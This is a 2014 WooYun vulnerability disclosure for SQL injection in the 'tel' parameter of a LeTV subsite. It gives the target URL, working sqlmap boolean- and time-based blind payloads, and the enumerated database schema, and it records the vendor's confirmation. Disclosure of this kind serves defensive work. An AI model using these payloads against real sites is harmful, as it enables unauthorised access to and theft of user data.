当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-062107

漏洞标题:乐视网某分站SQL注射漏洞之三

相关厂商:乐视网

漏洞作者:

提交时间:2014-05-24 11:20

修复时间:2014-07-08 11:21

公开时间:2014-07-08 11:21

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-05-24: 细节已通知厂商并且等待厂商处理中
2014-05-24: 厂商已经确认,细节仅向厂商公开
2014-06-03: 细节向核心白帽子及相关领域专家公开
2014-06-13: 细节向普通白帽子公开
2014-06-23: 细节向实习白帽子公开
2014-07-08: 细节向公众公开

简要描述:

“sql注射”敏感信息

详细说明:

乐视合作

q5.jpg

大鹏?屌丝男士?..

http://baolai.hz.letv.com/php/balaiadd.php?<code>callback=jQuery17106639694047626108_1400897743620&username=wooyun&tel=18688888888&sex=%E7%94%B7&prav=%E5%90%89%E6%9E%97&city=%E9%80%9A%E5%8C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469
tel参数过滤不严存在注入


---
Place: GET
Parameter: tel
    Type: boolean-based blind
    Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY claus
e (RLIKE)
    Payload: callback=jQuery17106639694047626108_1400897743620&username=wooyun&t
el=18688888888' RLIKE (SELECT (CASE WHEN (3539=3539) THEN 18688888888 ELSE 0x28
END)) AND 'Zlvz'='Zlvz&sex=%E7%94%B7&prav=%E5%90%89%E6%9E%97&city=%E9%80%9A%E5%8
C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%E8%BD%A6%E9%94%80%E5%94
%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: callback=jQuery17106639694047626108_1400897743620&username=wooyun&t
el=18688888888' AND SLEEP(5) AND 'eyzO'='eyzO&sex=%E7%94%B7&prav=%E5%90%89%E6%9E
%97&city=%E9%80%9A%E5%8C%96&addre=%E9%80%9A%E5%8C%96%E9%91%AB%E5%AE%87%E6%B1%BD%
E8%BD%A6%E9%94%80%E5%94%AE%E6%9C%89%E9%99%90%E5%85%AC%E5%8F%B8&_=1400897790469
---


available databases [2]:
[*] baolai
[*] information_schema


Database: baolai
[3 tables]
+--------+
| baolai |
| juben  |
| video  |
+--------+


Database: baolai
Table: baolai
[8 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| time     | varchar(100) |
| addre    | varchar(200) |
| city     | varchar(100) |
| id       | int(10)      |
| prav     | varchar(100) |
| sex      | varchar(10)  |
| tel      | varchar(60)  |
| username | varchar(60)  |
+----------+--------------+

漏洞证明:

Database: baolai
Table: juben
[6 columns]
+----------+----------------+
| Column   | Type           |
+----------+----------------+
| time     | varchar(100)   |
| bianhao  | varchar(10)    |
| cont     | varchar(10000) |
| num      | int(10)        |
| title    | varchar(100)   |
| username | varchar(100)   |
+----------+----------------+


Database: baolai
Table: video
[2 columns]
+--------+-------------+
| Column | Type        |
+--------+-------------+
| id     | varchar(10) |
| num    | int(10)     |
+--------+-------------+

修复方案:

过滤?

版权声明:转载请注明来源 @乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2014-05-24 11:53

厂商回复:

谢谢对我们安全的关注,尽快修复~

最新状态:

暂无

漏洞评价:

评论

  1. 2014-05-24 13:03 | 在路上 ( 普通白帽子 | Rank:193 漏洞数:13 | 在学习的路上、在成长的路上...)

    搞运维的 真苦逼 大周末 还要确认